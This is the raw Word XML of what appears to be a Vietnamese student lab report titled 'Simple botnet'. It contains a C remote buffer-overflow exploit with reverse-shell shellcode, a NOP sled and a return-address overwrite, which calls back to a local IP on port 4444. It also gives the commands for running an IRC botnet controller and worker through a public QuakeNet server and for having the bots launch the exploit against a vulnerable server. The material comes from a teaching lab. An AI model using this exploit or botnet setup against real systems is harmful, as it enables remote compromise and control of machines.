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32ABF619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AA14E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (Session 0</w:t>
      </w:r>
      <w:r w:rsidR="00AA14E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256D11A" w14:textId="02E9CE5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8481A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>simple botnet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008D866F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AA14E4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00AA14E4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/20</w:t>
      </w:r>
      <w:r w:rsidR="00AA14E4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7F1B5E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6B3066">
        <w:t>230</w:t>
      </w:r>
      <w:r w:rsidR="009613E4" w:rsidRPr="009613E4">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="006B3066">
        <w:t>N21</w:t>
      </w:r>
      <w:r w:rsidR="007D281E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006B3066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6B3066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6B3066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38834EC8" w:rsidR="008D0072" w:rsidRDefault="006B3066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3950C88D" w:rsidR="008D0072" w:rsidRDefault="006B3066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7F0DFEAD" w:rsidR="008D0072" w:rsidRDefault="006B3066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0BA3A84A" w:rsidR="0027532A" w:rsidRDefault="0027532A" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Kịch bản 0</w:t>
            </w:r>
            <w:r w:rsidR="00AA14E4">
              <w:t>5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482AEE2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9271EF6" w14:textId="393BDA1A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7AE834BB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0C2AD18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0E9884C9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31FE94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719561E2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5E25F784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61B454CC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74CC8B6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7EB159BC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417A67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5723B19" w14:textId="67091E07" w:rsidR="00BA539D" w:rsidRDefault="007D281E" w:rsidP="00B10F13">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 0</w:t>
      </w:r>
      <w:r w:rsidR="00AA14E4">
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887B89D" w14:textId="7682EC04" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Đầu tiên ta sẽ thực hiện code và chỉnh sửa lại chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662CBA9" w14:textId="2008E580" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ta sẽ thay đổi return address thành 0xffffcd3b và đổi địa chỉ push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698C4677" w14:textId="77777777" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00AA14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push   0x87fda8c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631B4538" w14:textId="77777777" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D"/>
    <w:p w14:paraId="154743D3" w14:textId="1C065CE5" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Do địa chỉ đổi thành máy local với ip là 192.168.253.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C27A884" w14:textId="1150A275" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Code của chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F204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stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C666FD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string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D69C2E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netdb.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D675E0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netinet/in.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218F164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BUF_SIZE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064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09564C3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EB6396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hellco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[]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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4644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31\xc0\x31\xdb\x31\xc9\x51\xb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C47E56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06\x51\xb1\x01\x51\xb1\x02\x5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1D38E36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89\xe1\xb3\x01\xb0\x66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A77F25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89\xc2\x31\xc0\x31\xc9\x51\x5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699590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"\xB9\x11\x11\x11\x11\x81\xF1\x1B\x40\x11\x17\x51\x31\xC9\x66\x68\x11\x5c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F98F2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68\xC0\xA8\xFD\x87\x66\x68\x11\x5C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7F59FB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b1\x02\x66\x51\x89\xe7\xb3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14FBF89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10\x53\x57\x52\x89\xe1\xb3\x03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17C373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b0\x66\xcd\x80\x31\xc9\x39\xc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355EC63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74\x06\x31\xc0\xb0\x01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0FE8182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5F2A17F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b1\x0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82A7A7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cd\x80\x31\xc0\xb0\x3f\x89\xd3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0A95F0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b1\x02\xcd\x80\x31\xc0\x31\xd2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CAF7F0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50\x68\x6e\x2f\x73\x68\x68\x2f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3A960E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2f\x62\x69\x89\xe3\x50\x53\x89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3F72F3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e1\xb0\x0b\xcd\x80\x31\xc0\xb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CDB651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01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37C2E76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B34E4A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tandard offset (probably must be modified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734293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#define RET 0xbffff28b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371E015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RET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xffffcd3b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15254E3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335E93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mai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c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*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[]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564007D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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717AAE4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BUF_SIZE];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7CE9CF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, i, size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7522622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_in remote;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431CFFC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hostent *host;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8CA44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087C3E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argc !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3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4372B1D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221E08F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 xml:space="preserve">"Usage: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%s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 xml:space="preserve"> target-ip port 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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A762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44A34CC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47C6028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filling buffer with NOPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CD04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memse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,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x9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, BUF_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAE698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713ACB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Modify the connectback ip address and port. In this case, the shellcode connects to 192.168.2.101 on port 17*256+92=4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6FE8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3] = 192;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEEF3C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4] = 168;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B13B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5] = 207;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100098E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6] = 144;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F73AC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495A74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9] = 17;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E116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40] = 92;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742D798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opying shellcode into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9B8C0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 +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90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), shellcode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) -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D56CE1D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662E20E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12B0124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fo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i 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90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; i &lt; BUF_SIZE -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4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; i +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4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07B9428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6938D7C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  *(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*)&amp;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i]) = RET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BADEB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4FFFAC4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[BUF_SIZE -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] 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x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E814C2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getting hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61525F2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host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gethostbynam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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301890B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host ==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NULL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39739B0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230E8B3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 xml:space="preserve">"Unknown Host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%s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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFFC7F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2A7732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3CF85A2F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reating socket...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA8827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s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socke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AF_INET, SOCK_STREAM,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1A1A3F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s &lt;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711CE07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7BDB76D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Error: Socket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D69FE1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6450A2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31A244B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tate Protocolfamily , then converting the hostname or IP address, and getting  port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393216B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sin_family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 AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D365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sin_add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 *(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in_addr *)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hos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-&gt;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h_add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73B016D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sin_por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htons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atoi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2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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2673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onnecting with destination host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502DD6A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onne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, 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 *)&amp;remote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remote)) ==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098FED2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7189C50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4D57E7B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Error: connect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062545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74A722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1E0A5F9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ending exploit string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0215C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size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send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, buffer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),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E091DD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size ==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1EC9EE8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43D0D12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3CF5187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sending data failed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1B86FC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3BA4603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2C0BBF5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losing socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B7A67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757A493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6F56E9D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0A25DCE" w14:textId="77777777" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D"/>
    <w:p w14:paraId="1FDFFF57" w14:textId="5D878A1F" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ta sẽ thực hiện build và chạy thử với 2 lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011182EC" w14:textId="1A877737" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>gcc remote</w:t>
      </w:r>
      <w:r w:rsidR="00554259">
        <w:t>exploit.c -o exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346F22B" w14:textId="07905E8B" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="550ED755" wp14:editId="3EBDA29C">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="180149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CEC1" w14:textId="77777777" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D"/>
    <w:p w14:paraId="2D247033" w14:textId="389F896A" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Đồng thời bên máy Ubuntu 14 ta sẽ thực hiện build vul_server và chạy, thì ta nhận được kết quả từ như hình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA452C8" w14:textId="1A68B2CD" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F082C3" wp14:editId="1E57A2E5">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="577702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C0A0" w14:textId="1F76443E" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Tiếp tục ta thực việc dựng lại botnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232F1286" w14:textId="1456F904" w:rsidR="00554259" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ở máy 1 chạy chương trình boss.py</w:t>
      </w:r>
      <w:r w:rsidR="00554259">
        <w:t xml:space="preserve"> bằng lệnh: python boss.py -c kiet -n kiet -x kiet -s euroserv.fr.quakenet.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C27F824" w14:textId="1F577101" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5924DB39" wp14:editId="56198457">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="199266013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013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10A1" w14:textId="7476E842" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ở máy 2 chạy chương trình myworker.py</w:t>
      </w:r>
      <w:r w:rsidR="00554259">
        <w:t xml:space="preserve"> bằng lệnh: python myworker.py -b kiet_508 -s euroserv.fr.quakenet.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B02EC7" w14:textId="78DD7472" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AF358E1" wp14:editId="23FCAE87">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="137572912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2912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6634" w14:textId="5C5EB526" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Tiếp theo ở máy chính window ta thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00554259">
        <w:t>chạy lệnh !execute run /home/kiet123/exploit 192.168.253.136 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC09048" w14:textId="4E864178" w:rsidR="00554259" w:rsidRDefault="00554259" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C69306" wp14:editId="3DE98B0C">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1115895626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95626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CE41" w14:textId="7B6979C2" w:rsidR="00554259" w:rsidRDefault="00554259" w:rsidP="00BA539D">
      <w:r>
        <w:t>Kiểm tra lại máy Ubuntu 14 ta thấy kết quả đã tấn công thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434BEF71" w14:textId="401A1E82" w:rsidR="00554259" w:rsidRDefault="00554259" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E21BC17" wp14:editId="4958F7E8">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="3633674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6742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7D4D" w14:textId="77777777" w:rsidR="008C5B67" w:rsidRDefault="008C5B67" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="40C3D096" w14:textId="77777777" w:rsidR="008C5B67" w:rsidRDefault="008C5B6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38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9271" w14:textId="77777777" w:rsidR="008C5B67" w:rsidRDefault="008C5B67" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2DEE446F" w14:textId="77777777" w:rsidR="008C5B67" w:rsidRDefault="008C5B67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786B07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AA14E4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>:</w:t>
    </w:r>
    <w:r w:rsidR="00AA14E4">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> Simple botnet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6F49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8E5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259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E24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066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5B67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81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3BD6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14E4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8</cp:revision>
  <cp:lastPrinted>2023-04-11T12:56:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-11T04:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-11T12:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>